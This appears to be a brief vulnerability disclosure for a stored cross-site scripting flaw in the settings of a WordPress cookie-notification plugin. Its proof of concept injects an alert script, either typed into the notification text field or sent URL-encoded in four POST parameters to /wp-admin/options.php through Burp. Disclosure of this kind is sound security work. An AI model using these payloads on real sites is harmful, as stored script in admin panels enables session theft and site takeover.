Input fields:

Notification text
Read more text
Read more URL
Button text
and more

Is vulnerable to stored cross-site scripting

PoC:

Input <script>alert(666);</script>
In Notification text input field
And the javascript will be executed, and stored after Saving.

Or

Intercept and modify the request body in Burp of the /wp-admin/options.php request with the body option_page=cpwp_database_settings POST request, with values:
cpwp_database_message=%3Cscript%3Ealert%28666%29%3B%3C%2Fscript%3E
cpwp_database_readMoreText=%3Cscript%3Ealert%28666%29%3B%3C%2Fscript%3E
cpwp_database_readMoreLink=%3Cscript%3Ealert%28666%29%3B%3C%2Fscript%3E
cpwp_database_buttonText=%3Cscript%3Ealert%28666%29%3B%3C%2Fscript%3E

And send.

The javascript will be stored, and executed when loading Cookie Notification under settings in the admin panel.